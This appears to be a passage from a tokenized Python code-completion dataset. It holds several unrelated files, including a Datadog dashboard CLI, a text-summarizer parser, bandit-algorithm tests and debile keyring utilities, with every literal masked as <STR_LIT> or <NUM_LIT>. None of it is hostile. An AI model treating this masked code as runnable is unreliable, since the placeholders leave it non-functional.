update_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" , nargs = "<STR_LIT:?>" ) <EOL> update_parser . add_argument ( '<STR_LIT>' , type = _template_variables , default = [ ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> update_parser . 
set_defaults ( func = cls . _update ) <EOL> show_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> show_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> show_parser . set_defaults ( func = cls . _show ) <EOL> show_all_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> show_all_parser . set_defaults ( func = cls . _show_all ) <EOL> pull_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pull_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> pull_parser . add_argument ( '<STR_LIT:filename>' , help = "<STR_LIT>" ) <EOL> pull_parser . set_defaults ( func = cls . _pull ) <EOL> pull_all_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pull_all_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> pull_all_parser . set_defaults ( func = cls . _pull_all ) <EOL> push_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> push_parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> push_parser . add_argument ( '<STR_LIT:file>' , help = "<STR_LIT>" , <EOL> nargs = '<STR_LIT:+>' , type = argparse . FileType ( '<STR_LIT:r>' ) ) <EOL> push_parser . set_defaults ( func = cls . _push ) <EOL> new_file_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> new_file_parser . add_argument ( '<STR_LIT:filename>' , help = "<STR_LIT>" ) <EOL> new_file_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" , nargs = "<STR_LIT:?>" ) <EOL> new_file_parser . set_defaults ( func = cls . _new_file ) <EOL> web_view_parser = verb_parsers . add_parser ( '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> web_view_parser . add_argument ( '<STR_LIT:file>' , help = "<STR_LIT>" , type = argparse . 
FileType ( '<STR_LIT:r>' ) ) <EOL> web_view_parser . set_defaults ( func = cls . _web_view ) <EOL> delete_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> delete_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> delete_parser . set_defaults ( func = cls . _delete ) <EOL> @ classmethod <EOL> def _pull ( cls , args ) : <EOL> cls . _write_dash_to_file ( <EOL> args . timeboard_id , args . filename , <EOL> args . timeout , args . format , args . string_ids ) <EOL> @ classmethod <EOL> def _pull_all ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> def _title_to_filename ( title ) : <EOL> no_punct = '<STR_LIT>' . join ( [ c for c in title . lower ( ) if c . isalnum ( ) or c in [ "<STR_LIT:U+0020>" , "<STR_LIT:_>" , "<STR_LIT:->" ] ] ) <EOL> return no_punct . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) . strip ( "<STR_LIT:_>" ) <EOL> format = args . format <EOL> res = api . Timeboard . get_all ( ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if not os . path . exists ( args . pull_dir ) : <EOL> os . mkdir ( args . pull_dir , <NUM_LIT> ) <EOL> used_filenames = set ( ) <EOL> for dash_summary in res [ '<STR_LIT>' ] : <EOL> filename = _title_to_filename ( dash_summary [ '<STR_LIT:title>' ] ) <EOL> if filename in used_filenames : <EOL> filename = filename + "<STR_LIT:->" + dash_summary [ '<STR_LIT:id>' ] <EOL> used_filenames . add ( filename ) <EOL> cls . _write_dash_to_file ( <EOL> dash_summary [ '<STR_LIT:id>' ] , os . path . join ( args . pull_dir , filename + "<STR_LIT>" ) , <EOL> args . timeout , format , args . string_ids ) <EOL> if format == '<STR_LIT>' : <EOL> print ( ( "<STR_LIT>" <EOL> . format ( len ( used_filenames ) , os . path . realpath ( args . pull_dir ) ) ) ) <EOL> @ classmethod <EOL> def _new_file ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> graphs = args . graphs <EOL> if args . 
graphs is None : <EOL> graphs = sys . stdin . read ( ) <EOL> try : <EOL> graphs = json . loads ( graphs ) <EOL> except : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> res = api . Timeboard . create ( <EOL> title = args . filename , <EOL> description = "<STR_LIT>" . format ( args . filename ) , <EOL> graphs = [ graphs ] ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> cls . _write_dash_to_file ( res [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , args . filename , <EOL> args . timeout , format , args . string_ids ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> @ classmethod <EOL> def _write_dash_to_file ( cls , dash_id , filename , timeout , format = '<STR_LIT>' , string_ids = False ) : <EOL> with open ( filename , "<STR_LIT:w>" ) as f : <EOL> res = api . Timeboard . get ( dash_id ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> dash_obj = res [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in dash_obj : <EOL> del dash_obj [ "<STR_LIT>" ] <EOL> if "<STR_LIT:url>" in dash_obj : <EOL> del dash_obj [ "<STR_LIT:url>" ] <EOL> if string_ids : <EOL> dash_obj [ "<STR_LIT:id>" ] = str ( dash_obj [ "<STR_LIT:id>" ] ) <EOL> json . dump ( dash_obj , f , indent = <NUM_LIT:2> ) <EOL> if format == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" . format ( dash_id , filename ) ) <EOL> else : <EOL> print ( "<STR_LIT>" . format ( dash_id , filename ) ) <EOL> @ classmethod <EOL> def _push ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> for f in args . file : <EOL> try : <EOL> dash_obj = json . load ( f ) <EOL> except Exception as err : <EOL> raise Exception ( "<STR_LIT>" . format ( f . name , err ) ) <EOL> if args . append_auto_text : <EOL> datetime_str = datetime . now ( ) . strftime ( '<STR_LIT>' ) <EOL> auto_text = ( "<STR_LIT>" <EOL> . format ( datetime_str , f . name , dash_obj [ "<STR_LIT:id>" ] , platform . 
node ( ) ) ) <EOL> dash_obj [ "<STR_LIT:description>" ] += auto_text <EOL> tpl_vars = dash_obj . get ( "<STR_LIT>" , [ ] ) <EOL> if '<STR_LIT:id>' in dash_obj : <EOL> dash_obj [ "<STR_LIT:id>" ] = int ( dash_obj [ "<STR_LIT:id>" ] ) <EOL> res = api . Timeboard . update ( dash_obj [ "<STR_LIT:id>" ] , title = dash_obj [ "<STR_LIT:title>" ] , <EOL> description = dash_obj [ "<STR_LIT:description>" ] , <EOL> graphs = dash_obj [ "<STR_LIT>" ] , template_variables = tpl_vars ) <EOL> else : <EOL> res = api . Timeboard . create ( title = dash_obj [ "<STR_LIT:title>" ] , <EOL> description = dash_obj [ "<STR_LIT:description>" ] , <EOL> graphs = dash_obj [ "<STR_LIT>" ] , template_variables = tpl_vars ) <EOL> if '<STR_LIT>' in res : <EOL> print_err ( '<STR_LIT>' <EOL> . format ( dash_obj [ "<STR_LIT:id>" ] , f . name ) ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> if args . format == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" . format ( f . name , dash_obj [ "<STR_LIT:id>" ] ) ) <EOL> @ classmethod <EOL> def _post ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> graphs = args . graphs <EOL> if args . graphs is None : <EOL> graphs = sys . stdin . read ( ) <EOL> try : <EOL> graphs = json . loads ( graphs ) <EOL> except : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> res = api . Timeboard . create ( title = args . title , description = args . description , graphs = [ graphs ] , <EOL> template_variables = args . template_variables ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> @ classmethod <EOL> def _update ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> graphs = args . graphs <EOL> if args . graphs is None : <EOL> graphs = sys . 
stdin . read ( ) <EOL> try : <EOL> graphs = json . loads ( graphs ) <EOL> except : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> res = api . Timeboard . update ( args . timeboard_id , title = args . title , <EOL> description = args . description , graphs = graphs , <EOL> template_variables = args . template_variables ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> @ classmethod <EOL> def _show ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> res = api . Timeboard . get ( args . timeboard_id ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if args . string_ids : <EOL> res [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] = str ( res [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> else : <EOL> print ( json . dumps ( res ) ) <EOL> @ classmethod <EOL> def _show_all ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> format = args . format <EOL> res = api . Timeboard . get_all ( ) <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> if args . string_ids : <EOL> for d in res [ "<STR_LIT>" ] : <EOL> d [ "<STR_LIT:id>" ] = str ( d [ "<STR_LIT:id>" ] ) <EOL> if format == '<STR_LIT>' : <EOL> print ( pretty_json ( res ) ) <EOL> elif format == '<STR_LIT>' : <EOL> print ( json . dumps ( res ) ) <EOL> else : <EOL> for d in res [ "<STR_LIT>" ] : <EOL> print ( "<STR_LIT:\t>" . join ( [ ( d [ "<STR_LIT:id>" ] ) , <EOL> ( d [ "<STR_LIT>" ] ) , <EOL> ( d [ "<STR_LIT:title>" ] ) , <EOL> cls . _escape ( d [ "<STR_LIT:description>" ] ) ] ) ) <EOL> @ classmethod <EOL> def _delete ( cls , args ) : <EOL> api . _timeout = args . timeout <EOL> res = api . Timeboard . delete ( args . 
timeboard_id ) <EOL> if res is not None : <EOL> report_warnings ( res ) <EOL> report_errors ( res ) <EOL> @ classmethod <EOL> def _web_view ( cls , args ) : <EOL> dash_id = json . load ( args . file ) [ '<STR_LIT:id>' ] <EOL> url = api . _api_host + "<STR_LIT>" . format ( dash_id ) <EOL> webbrowser . open ( url ) <EOL> @ classmethod <EOL> def _escape ( cls , s ) : <EOL> return s . replace ( "<STR_LIT:\r>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\n>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\t>" , "<STR_LIT>" ) <EOL> def _template_variables ( tpl_var_input ) : <EOL> if '<STR_LIT:[>' not in tpl_var_input : <EOL> return [ v . strip ( ) for v in tpl_var_input . split ( '<STR_LIT:U+002C>' ) ] <EOL> else : <EOL> try : <EOL> return json . loads ( tpl_var_input ) <EOL> except Exception : <EOL> raise argparse . ArgumentTypeError ( '<STR_LIT>' ) </s>
<s> import os <EOL> import time <EOL> from datetime import datetime as dt <EOL> from datetime import timedelta as delta <EOL> import math <EOL> from dogapi import dog_http_api as dog <EOL> dog . api_key = os . environ . get ( "<STR_LIT>" ) <EOL> dog . metric ( '<STR_LIT>' , <NUM_LIT> , host = "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> dog . metric ( '<STR_LIT>' , <NUM_LIT> , host = "<STR_LIT>" ) <EOL> now = dt . now ( ) <EOL> points = [ ] <EOL> for i in range ( <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> t = time . mktime ( ( now - delta ( minutes = i ) ) . timetuple ( ) ) <EOL> points . append ( ( t , math . cos ( i ) + <NUM_LIT:1.0> ) ) <EOL> dog . metric ( '<STR_LIT>' , points , host = "<STR_LIT>" ) <EOL> dog . event ( "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> import argparse <EOL> import os <EOL> import pkg_resources as pkg <EOL> import logging <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( logging . CRITICAL ) <EOL> from dogshell . common import DogshellConfig <EOL> from dogshell . comment import CommentClient <EOL> from dogshell . search import SearchClient <EOL> from dogshell . metric import MetricClient <EOL> from dogshell . tag import TagClient <EOL> from dogshell . event import EventClient <EOL> from dogshell . dashboard import DashClient <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' , <EOL> formatter_class = argparse . ArgumentDefaultsHelpFormatter ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> default = os . path . expanduser ( "<STR_LIT>" ) ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> dest = "<STR_LIT>" , default = None ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> dest = "<STR_LIT>" , default = None ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , action = '<STR_LIT>' , const = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , action = '<STR_LIT>' , const = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> default = <NUM_LIT:10> , type = int ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:version>' , <EOL> version = '<STR_LIT>' . format ( version = pkg . require ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . version ) ) <EOL> config = DogshellConfig ( ) <EOL> subparsers = parser . add_subparsers ( title = '<STR_LIT>' ) <EOL> CommentClient ( config ) . setup_parser ( subparsers ) <EOL> SearchClient ( config ) . setup_parser ( subparsers ) <EOL> MetricClient ( config ) . setup_parser ( subparsers ) <EOL> TagClient ( config ) . setup_parser ( subparsers ) <EOL> EventClient ( config ) . 
setup_parser ( subparsers ) <EOL> DashClient ( config ) . setup_parser ( subparsers ) <EOL> args = parser . parse_args ( ) <EOL> config . load ( args . config , args . api_key , args . app_key ) <EOL> args . func ( args ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import nltk . data <EOL> import os <EOL> class Parser : <EOL> def __init__ ( self ) : <EOL> self . ideal = <NUM_LIT> <EOL> self . stopWords = self . getStopWords ( ) <EOL> def getKeywords ( self , text ) : <EOL> text = self . removePunctations ( text ) <EOL> words = self . splitWords ( text ) <EOL> words = self . removeStopWords ( words ) <EOL> uniqueWords = list ( set ( words ) ) <EOL> keywords = [ { '<STR_LIT>' : word , '<STR_LIT:count>' : words . count ( word ) } for word in uniqueWords ] <EOL> keywords = sorted ( keywords , key = lambda x : - x [ '<STR_LIT:count>' ] ) <EOL> return ( keywords , len ( words ) ) <EOL> def getSentenceLengthScore ( self , sentence ) : <EOL> return ( self . ideal - abs ( self . ideal - len ( sentence ) ) ) / self . ideal <EOL> def getSentencePositionScore ( self , i , sentenceCount ) : <EOL> normalized = i / ( sentenceCount * <NUM_LIT:1.0> ) <EOL> if normalized > <NUM_LIT:0> and normalized <= <NUM_LIT:0.1> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT:0.1> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT:0.5> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT:0.5> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT:1.0> : <EOL> return <NUM_LIT> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def getTitleScore ( self , title , sentence ) : <EOL> titleWords = self . removeStopWords ( title ) <EOL> sentenceWords = self . 
removeStopWords ( sentence ) <EOL> matchedWords = [ word for word in sentenceWords if word in titleWords ] <EOL> return len ( matchedWords ) / ( len ( title ) * <NUM_LIT:1.0> ) <EOL> def splitSentences ( self , text ) : <EOL> tokenizer = nltk . data . load ( '<STR_LIT>' + os . path . dirname ( os . path . abspath ( __file__ ) ) + '<STR_LIT>' ) <EOL> return tokenizer . tokenize ( text ) <EOL> def splitWords ( self , sentence ) : <EOL> return sentence . lower ( ) . split ( ) <EOL> def removePunctations ( self , text ) : <EOL> return '<STR_LIT>' . join ( t for t in text if t . isalnum ( ) or t == '<STR_LIT:U+0020>' ) <EOL> def removeStopWords ( self , words ) : <EOL> return [ word for word in words if word not in self . stopWords ] <EOL> def getStopWords ( self ) : <EOL> with open ( os . path . dirname ( os . path . abspath ( __file__ ) ) + '<STR_LIT>' ) as file : <EOL> words = file . readlines ( ) <EOL> return [ word . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) for word in words ] </s>
<s> from glad . lang . common . loader import BaseLoader <EOL> from glad . lang . nim . loader import LOAD_OPENGL_DLL <EOL> _OPENGL_LOADER = LOAD_OPENGL_DLL % { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } + '''<STR_LIT>''' <EOL> _OPENGL_HAS_EXT_LT3 = '''<STR_LIT>''' <EOL> _OPENGL_HAS_EXT_GTE3 = '''<STR_LIT>''' <EOL> _FIND_VERSION = '''<STR_LIT>''' <EOL> _BEGIN_LOAD = '''<STR_LIT>''' <EOL> class OpenGLNimLoader ( BaseLoader ) : <EOL> def write_header_end ( self , fobj ) : <EOL> pass <EOL> def write_header ( self , fobj ) : <EOL> pass <EOL> def write ( self , fobj ) : <EOL> pass <EOL> def write_begin_load ( self , fobj ) : <EOL> fobj . write ( _BEGIN_LOAD ) <EOL> def write_end_load ( self , fobj ) : <EOL> fobj . write ( '<STR_LIT>' ) <EOL> def write_find_core ( self , fobj ) : <EOL> fobj . write ( _FIND_VERSION ) <EOL> def write_has_ext ( self , fobj , apiversion ) : <EOL> if apiversion . major == <NUM_LIT:1> and apiversion . minor == <NUM_LIT:0> : <EOL> return <EOL> if apiversion . major < <NUM_LIT:3> : <EOL> fobj . write ( _OPENGL_HAS_EXT_LT3 ) <EOL> else : <EOL> fobj . write ( _OPENGL_HAS_EXT_GTE3 ) </s>
<s> import unittest <EOL> from tests . test_utils import makeBandit <EOL> import random <EOL> import sys <EOL> from collections import Counter <EOL> class MonteCarloTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def draw ( self , arm_name ) : <EOL> if random . random ( ) > self . true_arm_probs [ arm_name ] : <EOL> return <NUM_LIT:0.0> <EOL> return <NUM_LIT:1.0> <EOL> def run_algo ( self , bandit , num_sims , horizon ) : <EOL> chosen_arms = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> rewards = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> cumulative_rewards = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> sim_nums = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> times = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> for sim in range ( num_sims ) : <EOL> sim = sim + <NUM_LIT:1> <EOL> for t in range ( horizon ) : <EOL> t = t + <NUM_LIT:1> <EOL> index = ( sim - <NUM_LIT:1> ) * horizon + t - <NUM_LIT:1> <EOL> sim_nums [ index ] = sim <EOL> times [ index ] = t <EOL> chosen_arm = bandit . suggest_arm ( ) <EOL> chosen_arms [ index ] = chosen_arm [ '<STR_LIT:id>' ] <EOL> bandit . pull_arm ( chosen_arm [ '<STR_LIT:id>' ] ) <EOL> reward = self . draw ( chosen_arm [ '<STR_LIT:id>' ] ) <EOL> rewards [ index ] = reward <EOL> if t == <NUM_LIT:1> : <EOL> cumulative_rewards [ index ] = reward <EOL> else : <EOL> cumulative_rewards [ index ] = cumulative_rewards [ index - <NUM_LIT:1> ] + reward <EOL> if reward : <EOL> bandit . reward_arm ( chosen_arm [ '<STR_LIT:id>' ] , reward ) <EOL> return [ sim_nums , times , chosen_arms , rewards , cumulative_rewards ] <EOL> def save_results ( self , results , output_stream ) : <EOL> for sim in range ( len ( results [ <NUM_LIT:0> ] ) ) : <EOL> output_stream . write ( "<STR_LIT:U+0020>" . join ( [ str ( results [ j ] [ sim ] ) for j in range ( len ( results ) ) ] ) + "<STR_LIT:\n>" ) <EOL> sys . stdout . 
flush ( ) <EOL> class EpsilonGreedyTest ( MonteCarloTest ) : <EOL> bandit_name = '<STR_LIT>' <EOL> true_arm_probs = dict ( green = <NUM_LIT> , blue = <NUM_LIT:0.1> , red = <NUM_LIT:0.1> ) <EOL> def test_bandit ( self ) : <EOL> results = self . run_algo ( makeBandit ( self . bandit_name , epsilon = <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> data = Counter ( results [ <NUM_LIT:2> ] ) <EOL> assert data . most_common ( <NUM_LIT:1> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] is '<STR_LIT>' <EOL> class SoftmaxTest ( MonteCarloTest ) : <EOL> true_arm_probs = dict ( green = <NUM_LIT> , red = <NUM_LIT> , blue = <NUM_LIT> ) <EOL> def test_bandit ( self ) : <EOL> results = self . run_algo ( makeBandit ( '<STR_LIT>' , tau = <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> data = Counter ( results [ <NUM_LIT:2> ] ) <EOL> assert data . most_common ( <NUM_LIT:1> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] is '<STR_LIT>' <EOL> class AnnealingSoftmaxTest ( MonteCarloTest ) : <EOL> true_arm_probs = dict ( green = <NUM_LIT> , red = <NUM_LIT> , blue = <NUM_LIT> ) <EOL> def test_bandit ( self ) : <EOL> results = self . run_algo ( makeBandit ( '<STR_LIT>' , tau = <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> data = Counter ( results [ <NUM_LIT:2> ] ) <EOL> assert data . most_common ( <NUM_LIT:1> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] is '<STR_LIT>' <EOL> class ThompsonBanditTest ( MonteCarloTest ) : <EOL> true_arm_probs = dict ( green = <NUM_LIT> , red = <NUM_LIT> , blue = <NUM_LIT> ) <EOL> def test_bandit ( self ) : <EOL> results = self . run_algo ( makeBandit ( '<STR_LIT>' ) , <NUM_LIT> , <NUM_LIT> ) <EOL> data = Counter ( results [ <NUM_LIT:2> ] ) <EOL> assert data . most_common ( <NUM_LIT:1> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] is '<STR_LIT>' </s>
<s> from debile . utils . commands import run_command <EOL> from debile . master . orm import Person , Builder <EOL> from base64 import b64decode <EOL> from hashlib import sha1 <EOL> import fcntl <EOL> import os <EOL> def import_pgp ( keyring , keydata ) : <EOL> """<STR_LIT>""" <EOL> out , err , ret = run_command ( [ <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:1>" <EOL> "<STR_LIT>" , "<STR_LIT>" , keyring , <EOL> "<STR_LIT>" <EOL> ] , input = keydata ) <EOL> fingerprint = None <EOL> for line in out . split ( "<STR_LIT:\n>" ) : <EOL> data = line . split ( ) <EOL> if not data or data [ <NUM_LIT:0> ] != "<STR_LIT>" : <EOL> continue <EOL> if data [ <NUM_LIT:1> ] == "<STR_LIT>" : <EOL> fingerprint = data [ <NUM_LIT:3> ] <EOL> break <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return fingerprint <EOL> def import_ssl ( keyring , certdata , cn = None , email = None ) : <EOL> """<STR_LIT>""" <EOL> out , err , ret = run_command ( [ <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> ] , input = certdata ) <EOL> fingerprint = None <EOL> subject = None <EOL> for line in out . split ( "<STR_LIT:\n>" ) : <EOL> data = line . split ( "<STR_LIT:=>" , <NUM_LIT:1> ) <EOL> if data [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> fingerprint = data [ <NUM_LIT:1> ] . replace ( '<STR_LIT::>' , '<STR_LIT>' ) <EOL> if data [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> subject = data [ <NUM_LIT:1> ] . split ( '<STR_LIT:/>' ) <EOL> if fingerprint is None or subject is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if ( ( cn and not "<STR_LIT>" . format ( cn = cn ) in subject ) or <EOL> ( email and not "<STR_LIT>" . format ( email = email ) in subject ) ) : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( cn , email , subject ) ) <EOL> keyring = open ( keyring , '<STR_LIT:a>' ) <EOL> fcntl . lockf ( keyring , fcntl . LOCK_EX ) <EOL> keyring . write ( certdata ) <EOL> keyring . 
close ( ) <EOL> return fingerprint <EOL> def clean_ssl_keyring ( keyring , session ) : <EOL> old = open ( keyring , '<STR_LIT>' ) <EOL> fcntl . lockf ( old , fcntl . LOCK_EX ) <EOL> new = open ( keyring + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> fcntl . lockf ( new , fcntl . LOCK_EX ) <EOL> for line in old : <EOL> if "<STR_LIT>" in line : <EOL> der = b"<STR_LIT>" <EOL> pem = line <EOL> elif "<STR_LIT>" in line : <EOL> pem += line <EOL> fingerprint = sha1 ( der ) . hexdigest ( ) . upper ( ) <EOL> builder = session . query ( Builder ) . filter_by ( ssl = fingerprint ) . first ( ) <EOL> user = session . query ( Person ) . filter_by ( ssl = fingerprint ) . first ( ) <EOL> if builder or user : <EOL> new . write ( pem ) <EOL> else : <EOL> der += b64decode ( line . strip ( ) ) <EOL> pem += line <EOL> new . close ( ) <EOL> os . rename ( keyring + '<STR_LIT>' , keyring ) <EOL> old . close ( ) </s>
<s> from debile . slave . wrappers . findbugs import parse_findbugs <EOL> from debile . slave . utils import cd <EOL> from debile . utils . commands import run_command <EOL> def findbugs ( deb , analysis ) : <EOL> run_command ( [ "<STR_LIT>" , "<STR_LIT>" , deb , "<STR_LIT>" ] ) <EOL> with cd ( '<STR_LIT>' ) : <EOL> out , err , ret = run_command ( [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:.>' <EOL> ] ) <EOL> xmlbytes = out . encode ( "<STR_LIT:utf-8>" ) <EOL> failed = False <EOL> for issue in parse_findbugs ( xmlbytes ) : <EOL> analysis . results . append ( issue ) <EOL> if not failed and issue . severity in [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:error>' , '<STR_LIT>' <EOL> ] : <EOL> failed = True <EOL> return ( analysis , err , failed , None , None ) <EOL> def version ( ) : <EOL> out , err , ret = run_command ( [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] ) <EOL> if ret != <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> name , version = out . split ( "<STR_LIT:U+0020>" ) <EOL> return ( name , version . strip ( ) ) </s>
<s> import json <EOL> import os <EOL> import sys <EOL> from ConfigParser import SafeConfigParser <EOL> from sqlalchemy import create_engine , Text , TypeDecorator <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> from sqlalchemy . orm import sessionmaker <EOL> def build_db_conn_string ( cfg ) : <EOL> if cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) . lower ( ) == "<STR_LIT>" : <EOL> return "<STR_LIT>" . format ( ** { <EOL> "<STR_LIT>" : cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> } ) <EOL> return "<STR_LIT>" . format ( ** { <EOL> "<STR_LIT>" : cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT:username>" : cfg . get ( "<STR_LIT>" , "<STR_LIT:username>" ) , <EOL> "<STR_LIT:password>" : cfg . get ( "<STR_LIT>" , "<STR_LIT:password>" ) , <EOL> "<STR_LIT:host>" : cfg . get ( "<STR_LIT>" , "<STR_LIT:host>" ) , <EOL> "<STR_LIT>" : cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> } ) <EOL> class JSONSerialized ( TypeDecorator ) : <EOL> impl = Text <EOL> def process_bind_param ( self , value , dialect ) : <EOL> return json . dumps ( value ) <EOL> def process_result_value 